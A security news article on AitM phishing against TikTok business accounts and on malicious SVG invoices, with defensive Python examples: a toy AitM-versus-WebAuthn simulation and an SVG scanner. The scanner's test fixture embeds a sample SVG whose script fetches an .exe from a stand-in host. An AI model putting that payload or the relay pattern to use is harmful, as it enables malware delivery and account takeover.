AitM Phishing Attacks Target TikTok Business Accounts
- 1 day ago
- 2 minute read
Attackers are targeting TikTok for Business accounts in a new phishing campaign.
According to Push Security, the campaign begins with the victim clicking a malicious link. The link leads either to a page mimicking TikTok for Business or to a fake recruitment page styled after Google Careers; in some variants the victim is also offered the chance to schedule an interview for a supposed job opening. These lures exist to build trust before the victim is asked to log in, and the goal is to capture those login credentials.
A notable feature of the campaign is the attackers' use of Cloudflare Turnstile on their pages. Turnstile is a legitimate anti-bot check; placed in front of the phishing content, it keeps URL scanners, sandboxes, and crawlers from fetching and analyzing the malicious page, while a human victim simply clicks through. After passing the check, the user lands on an AitM (adversary-in-the-middle) phishing page that closely resembles the real login screen. An AitM page does not merely imitate the login form; it proxies the victim's submissions to the genuine site, so the username and password, any one-time MFA code typed into it, and the session cookie the real site issues in response all pass through the attackers' infrastructure. With that session cookie in hand, the attackers can use the account without repeating the login or the MFA step.
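The difference between relaying a one-time code and relaying an origin-bound credential is easiest to see in code. The following is an added illustration, not code from the article or from Push Security: a toy relying party, a model of the victim's browser plus security key, and an AitM proxy. The origins, the victim password, the RP ID, and the HMAC-based signature (standing in for a real authenticator's asymmetric signature) are all constructed assumptions.

```python
import hashlib
import hmac
import json
import secrets

LEGIT_ORIGIN = "https://ads.tiktok.com"                 # assumed legitimate login origin
PHISH_ORIGIN = "https://tiktok-business-login.example"  # constructed AitM proxy origin
RP_ID = "tiktok.com"                                    # RP ID the security key was registered under


class RelyingParty:
    """Minimal model of the real site: password + TOTP login, and a WebAuthn-style login."""

    def __init__(self):
        self.password = "hunter2"                  # constructed victim password
        self.totp_secret = secrets.token_bytes(20)
        self.device_key = secrets.token_bytes(32)  # HMAC key standing in for the registered public key
        self.sessions, self.pending_challenges = set(), set()

    def current_totp(self):
        # RFC 4226 dynamic truncation with a fixed counter so the run is deterministic.
        digest = hmac.new(self.totp_secret, b"\x00" * 8, hashlib.sha1).digest()
        offset = digest[-1] & 0x0F
        code = (int.from_bytes(digest[offset:offset + 4], "big") & 0x7FFFFFFF) % 1_000_000
        return f"{code:06d}"

    def login_password_totp(self, password, code):
        if password == self.password and hmac.compare_digest(code, self.current_totp()):
            sid = secrets.token_hex(16)            # the session cookie an AitM proxy walks away with
            self.sessions.add(sid)
            return sid
        return None

    def webauthn_challenge(self):
        challenge = secrets.token_bytes(32)
        self.pending_challenges.add(challenge)
        return challenge

    def login_webauthn(self, assertion):
        if assertion is None:
            return None
        client_data = json.loads(assertion["clientDataJSON"])
        challenge = bytes.fromhex(client_data["challenge"])
        # The origin is written by the browser and covered by the signature, so a
        # proxy can neither leave its own origin in place nor rewrite it to ours.
        if client_data["origin"] != LEGIT_ORIGIN or challenge not in self.pending_challenges:
            return None
        self.pending_challenges.discard(challenge)
        signed = assertion["authenticatorData"] + hashlib.sha256(assertion["clientDataJSON"].encode()).digest()
        expected = hmac.new(self.device_key, signed, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, assertion["signature"]):
            return None
        sid = secrets.token_hex(16)
        self.sessions.add(sid)
        return sid


def browser_authenticator(device_key, page_origin, challenge):
    """Victim's browser plus security key: the browser fills in the origin it is
    displaying and refuses an RP ID that is not a suffix of that origin's host."""
    host = page_origin.split("://", 1)[1]
    if not (host == RP_ID or host.endswith("." + RP_ID)):
        return None
    client_data = json.dumps({"type": "webauthn.get", "challenge": challenge.hex(), "origin": page_origin})
    auth_data = hashlib.sha256(RP_ID.encode()).digest() + b"\x01"  # rpIdHash || flags (user present)
    signed = auth_data + hashlib.sha256(client_data.encode()).digest()
    return {"clientDataJSON": client_data, "authenticatorData": auth_data,
            "signature": hmac.new(device_key, signed, hashlib.sha256).digest()}


class AitMProxy:
    """Reverse proxy on PHISH_ORIGIN that forwards the victim's submissions to the real site."""

    def __init__(self, rp):
        self.rp, self.captured = rp, {}

    def relay_password_totp(self, password, code):
        session = self.rp.login_password_totp(password, code)  # the real site accepts the relayed code
        self.captured = {"password": password, "totp": code, "session": session}
        return session

    def forge_webauthn(self, challenge):
        # Attacker writes the real origin into clientDataJSON but has no key to sign with.
        client_data = json.dumps({"type": "webauthn.get", "challenge": challenge.hex(), "origin": LEGIT_ORIGIN})
        return {"clientDataJSON": client_data, "authenticatorData": b"\x00" * 33, "signature": secrets.token_bytes(32)}


def run_scenarios():
    rp = RelyingParty()
    proxy = AitMProxy(rp)
    stolen = proxy.relay_password_totp("hunter2", rp.current_totp())  # victim typed both into the AitM page
    phished = rp.login_webauthn(browser_authenticator(rp.device_key, PHISH_ORIGIN, rp.webauthn_challenge()))
    forged = rp.login_webauthn(proxy.forge_webauthn(rp.webauthn_challenge()))
    legit = rp.login_webauthn(browser_authenticator(rp.device_key, LEGIT_ORIGIN, rp.webauthn_challenge()))
    return {"otp_session_stolen": stolen is not None and stolen in rp.sessions,
            "webauthn_phished": phished is not None,
            "webauthn_forged": forged is not None,
            "webauthn_legit": legit is not None}
```

Calling run_scenarios() shows the relayed password and TOTP yielding a session the proxy now holds, while the WebAuthn ceremony on the lookalike origin never produces a usable assertion: the browser refuses the RP ID, and a forged clientDataJSON carrying the real origin fails the signature check. The same key logs in normally on the genuine origin, which is the property the phishing-resistant label refers to.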

Compromised business social media accounts are highly valuable to attackers: they can be used to run fraudulent advertising campaigns, spread malicious links, distribute malware, or deceive more people by trading on the account's existing credibility and follower base. Push Security notes that TikTok itself has previously been abused with social-engineering content to distribute infostealers such as Vidar, StealC, and Aura Stealer.
The report also highlights a separate campaign. In this second attack chain, targets, particularly users in Venezuela, receive files with the .svg extension disguised as invoices, receipts, or price quotes. According to WatchGuard, opening one of these SVG files establishes a connection to a malicious URL in the background and downloads malware onto the device. SVG is an XML document format rather than a plain bitmap: it can carry embedded script and references to external resources, which is what lets a file that looks like an image act as a downloader. The downloaded malware is reported to be Go-based and to share similarities with samples previously associated with BianLian ransomware.
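Because the file is XML, a static pre-screen can catch the building blocks such a lure needs before anyone opens it. The following is an added example, not code from the article or from WatchGuard's report: a small SVG triage scanner that flags script elements, event-handler attributes, and href values that point outside the file. The two SVG documents embedded in it are constructed samples, not the campaign's files, and their hosts use the reserved .invalid TLD.

```python
import re
import xml.etree.ElementTree as ET  # for untrusted files in production, parse with defusedxml instead

RISKY_TAGS = {"script", "foreignObject", "iframe", "embed", "object"}
REMOTE_RE = re.compile(r"^(https?:|//|javascript:|data:)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"'<>]+")

# Constructed samples, not files from the campaign; hosts use the reserved .invalid TLD.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="120" height="40">
  <rect width="120" height="40" fill="#eee"/><text x="8" y="25">Factura</text>
</svg>"""

SUSPICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="go()">
  <text x="8" y="25">Factura</text>
  <script>
    window.location = "https://cdn.example.invalid/factura.exe";
  </script>
  <image xlink:href="https://cdn.example.invalid/track.gif" width="1" height="1"/>
</svg>"""


def _local(name):
    """Strip the {namespace} prefix ElementTree attaches to tag and attribute names."""
    return name.rsplit("}", 1)[-1]


def scan_svg(data):
    """Return (kind, detail) findings for one SVG document; an empty list means nothing was flagged."""
    findings = []
    for el in ET.fromstring(data).iter():
        tag = _local(el.tag)
        if tag in RISKY_TAGS:
            findings.append(("element", tag))
            if tag == "script" and el.text:
                findings.extend(("script-url", url) for url in URL_RE.findall(el.text))
        for attr, value in el.attrib.items():
            name = _local(attr)
            if name.lower().startswith("on"):                        # onload=, onclick=, onerror=, ...
                findings.append(("event-handler", f"<{tag} {name}>"))
            elif name == "href" and REMOTE_RE.match(value.strip()):  # href= and xlink:href= alike
                findings.append(("remote-href", f"<{tag}> {value.strip()}"))
    return findings


def is_suspicious(data):
    return bool(scan_svg(data))


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_SVG), ("suspicious", SUSPICIOUS_SVG)):
        print(label, scan_svg(doc))
```

The findings are deliberately coarse: a legitimate link to a website inside an SVG is reported too, which is the right bias for attachments arriving as invoices from unknown senders. A clean result is not proof of safety, since a renderer may still follow external references the scanner does not model, so treat it as a first filter before sandbox detonation rather than a verdict.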
In summary, these two examples show that attackers are mounting far more convincing attacks not only with fake domains but also through legitimate-looking pages, anti-bot controls, and seemingly harmless file types. For business accounts in particular, checking where a link actually leads, using multi-factor authentication, and verifying unexpected attachments before opening them are essential.
Some of the precautions that help against these types of attacks include:
Do not open emails or attachments from untrusted sources, and treat image-type attachments such as SVG with the same suspicion as executables.
Use multi-factor authentication (MFA), preferring phishing-resistant methods (FIDO2/WebAuthn security keys or passkeys) where the platform supports them, since AitM phishing relays one-time codes and push approvals.
Keep systems updated to the latest version at all times.
Monitor login logs regularly for sessions from unfamiliar locations, devices, or IP addresses.
Keep mobile devices under security management.
For detailed information, you can reach out to our experts at info@zerosecond.com.ae